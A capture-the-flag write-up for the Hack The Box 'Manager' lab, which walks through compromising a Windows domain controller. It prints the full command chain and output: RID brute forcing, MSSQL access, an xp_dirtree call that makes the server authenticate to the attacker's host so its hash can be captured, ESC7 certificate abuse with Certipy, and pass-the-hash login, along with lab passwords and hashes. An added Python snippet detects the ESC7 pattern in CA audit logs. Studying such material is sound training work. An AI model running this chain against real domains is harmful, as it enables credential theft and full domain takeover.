| Machine Name | Difficulty | Date Started | Date Completed |
|---|---|---|---|
| Manager | Medium | 23/10/2023 | 23/10/2023 |

Learning Points:
- Enumerating internal file systems using MSSQL Service
- Exploiting ADCS ESC7 Vulnerability
Attack Path:
- Perform a RID brute force attack using CME to identify users.
- Perform a password attack with the format ‘username:username’ and identify valid credentials to log in to the MSSQL service.
- Read internal files using the MSSQL service and identify a website backup containing credentials of a user.
- Log in to the machine as the user and get the user flag.
- Identify that the machine is vulnerable to the ADCS ESC7 vulnerability and exploit it to get the hash of the administrator as described in Hacktricks - Attack 2.
- Use the hash to perform a Pass-the-Hash (PtH) attack using Evil-WinRM and log in to the machine to get the root flag.
Default Nmap scan:
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ nmap -sC -sV 10.10.11.236 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-23 09:57 +0530
Nmap scan report for 10.10.11.236
Host is up (0.31s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 11:27:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-23T11:29:12+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-23T08:55:07
|_Not valid after: 2053-10-23T08:55:07
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:13+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-23T11:29:12+00:00; +6h59m59s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-23T11:28:36
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.69 seconds
We were not able to enumerate any users using tools such as Kerbrute. However, we performed a RID brute-force attack using CrackMapExec and were able to dump some users for further enumeration.
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ crackmapexec smb manager.htb -u 'anonymous' -p '' --rid-brute
SMB manager.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB manager.htb 445 DC01 [+] manager.htb\anonymous:
SMB manager.htb 445 DC01 [+] Brute forcing RIDs
SMB manager.htb 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB manager.htb 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB manager.htb 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB manager.htb 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB manager.htb 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB manager.htb 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB manager.htb 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB manager.htb 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB manager.htb 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB manager.htb 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB manager.htb 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB manager.htb 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB manager.htb 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB manager.htb 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB manager.htb 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB manager.htb 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB manager.htb 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Using Hydra, we performed a password attack with the format username:username and found that Operator:operator could be used to log in to the MSSQL service. We then used these credentials to access MSSQL with the Impacket mssqlclient.py script.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ impacket-mssqlclient -p 1433 -windows-auth -dc-ip 10.10.11.236 "manager.htb/Operator:operator"@10.10.11.236
Impacket v0.10.1.dev1+20230327.122651.a3f0373d - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
We were able to force the MSSQL service to authenticate to our host over SMB and capture the NetNTLMv2 hash of the DC01$ machine account (domain MANAGER) with Responder.
Read more: MSSQL Pentesting

Executing the command:
SQL> exec master.dbo.xp_dirtree '\\10.10.14.218\any\thing'
Capturing the hash using Responder:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:0a281460292a20ff... [hash truncated]
We couldn’t use the hash for anything useful, so we tried to enumerate MSSQL further. We were able to list directories using the same command we used to capture the hash:
SQL> EXEC master.dbo.xp_dirtree '\', 1, 1;
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
temp 1 0
Users 1 0
Windows 1 0
SQL> EXEC master.dbo.xp_dirtree '\inetpub', 1, 1;
subdirectory depth file
------------ ----- ----
custerr 1 0
history 1 0
logs 1 0
temp 1 0
wwwroot 1 0
SQL> EXEC master.dbo.xp_dirtree '\inetpub\wwwroot', 1, 1;
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
We were able to download the ZIP file to our local machine by visiting the webpage http://10.10.11.236/website-backup-27-07-23-old.zip (as the ZIP file was hosted in the same directory as the webpage).
Inside the extracted files, we encountered a hidden file that contained the credentials of the user raven:
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager/zip]
└─$ ls -la
total 1092
drwxr-xr-x 5 parallels parallels 4096 Oct 23 12:45 .
drwxr-xr-x 6 parallels parallels 4096 Oct 23 12:45 ..
-rw-r--r-- 1 parallels parallels 5386 Jul 27 05:32 about.html
-rw-r--r-- 1 parallels parallels 5317 Jul 27 05:32 contact.html
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 css
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 images
-rw-r--r-- 1 parallels parallels 18203 Jul 27 05:32 index.html
drwxr-xr-x 2 parallels parallels 4096 Oct 23 12:45 js
-rw-r--r-- 1 parallels parallels 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 parallels parallels 7900 Jul 27 05:32 service.html
-rw-r--r-- 1 parallels parallels 1045328 Oct 23 12:44 website-backup-27-07-23-old.zip
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager/zip]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
We were able to use Evil-WinRM to log in to the machine as the user raven and capture the user flag:

Privilege Escalation
While enumerating with Certipy, we discovered that the Domain Controller's CA was vulnerable to ESC7 (Vulnerable Certificate Authority Access Control). We performed the attack described in Hacktricks - Attack 2 and were able to escalate to administrator and retrieve the root flag.
We grant ourselves the **Manage Certificates** access right by adding our user as a new officer.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
We start by requesting a certificate based on the SubCA template.
This request will be denied, but we save the private key and note down the request ID.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 31
Would you like to save the private key? (y/N) y
[*] Saved private key to 31.key
[-] Failed to request certificate
With our Manage CA and Manage Certificates rights, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad ca -ca 'manager-DC01-CA' -issue-request 31 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target dc01.manager.htb -retrieve 31
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 31
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '31.key'
[*] Saved certificate and private key to 'administrator.pfx'
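The sequence above (an officer added, a request denied, then the same request ID issued for a different UPN) leaves a trail in the CA's audit log. The following is an added example, not part of the original writeup, that correlates Windows CA audit events 4890 (certificate manager settings changed), 4888 (request denied) and 4887 (request issued) to flag that pattern; the event records are constructed sample data and the field names are assumptions about how the events were parsed.

```python
"""Flag the ESC7 'deny, then manually issue' pattern in CA audit events.
Constructed sample events (not real logs); field names are assumptions."""

SAMPLE_EVENTS = [
    {"id": 4890, "time": "2023-10-23T11:40:01Z", "actor": "MANAGER\\raven",
     "detail": "Certificate Manager added: MANAGER\\Raven"},
    {"id": 4888, "time": "2023-10-23T11:41:10Z", "request_id": 31,
     "requester": "MANAGER\\raven", "template": "SubCA"},
    {"id": 4887, "time": "2023-10-23T11:42:05Z", "request_id": 31,
     "requester": "MANAGER\\raven", "template": "SubCA",
     "subject_upn": "administrator@manager.htb"},
    # Benign issuance: never denied, UPN matches the requester.
    {"id": 4887, "time": "2023-10-23T11:43:00Z", "request_id": 32,
     "requester": "MANAGER\\DC01$", "template": "DomainController",
     "subject_upn": "DC01$@manager.htb"},
]


def account_of(principal):
    """'MANAGER\\raven' -> 'raven', 'raven@manager.htb' -> 'raven' (case-folded)."""
    return principal.split("\\")[-1].split("@")[0].lower()


def find_suspicious_issuances(events):
    """Return one finding per request ID that was denied (4888) and later
    issued (4887). Each finding notes whether the issued UPN differs from the
    requesting account and whether an officer change (4890) preceded it."""
    ordered = sorted(events, key=lambda e: e["time"])  # ISO-8601, lexical order
    denied, officer_changes, findings = {}, [], []
    for e in ordered:
        if e["id"] == 4890:
            officer_changes.append(e["time"])
        elif e["id"] == 4888:
            denied[e["request_id"]] = e
        elif e["id"] == 4887 and e["request_id"] in denied:
            findings.append({
                "request_id": e["request_id"],
                "template": e["template"],
                "requester": e["requester"],
                "subject_upn": e["subject_upn"],
                "upn_mismatch": account_of(e["requester"]) != account_of(e["subject_upn"]),
                "officer_change_before": any(t < e["time"] for t in officer_changes),
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_issuances(SAMPLE_EVENTS):
        print(finding)
```

A finding with both flags set is the ESC7 Attack 2 signature; a legitimate manual approval normally has a matching UPN and no officer change minutes earlier.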
Then we used the administrator.pfx certificate to obtain the Administrator hash, but this failed several times because the server's clock differed from ours.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad auth -pfx "administrator.pfx" -dc-ip 10.10.11.236 -username 'administrator' -domain 'manager.htb'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
We tried several ways to modify the time but failed, and finally used ntpdate to set our clock to the server's time.
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ sudo ntpdate 10.10.11.236
2023-10-23 22:04:40.186599 (+0530) +25198.078677 +/- 0.157152 10.10.11.236 s1 no-leap
CLOCK: time stepped by 25198.078677
Then we were able to grab the hash of the administrator:
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ certipy-ad auth -pfx "administrator.pfx" -dc-ip 10.10.11.236 -username 'administrator' -domain 'manager.htb'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
We were then able to log in to the machine with Evil-WinRM using the hash:
┌──(parallels㉿kali-linux-2022-2)-[~/ctf-htb/manager]
└─$ evil-winrm -i 10.10.11.236 -u Administrator -H "ae5064c2f62317332c88629e025924ef"
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/23/2023 1:55 AM 34 root.txt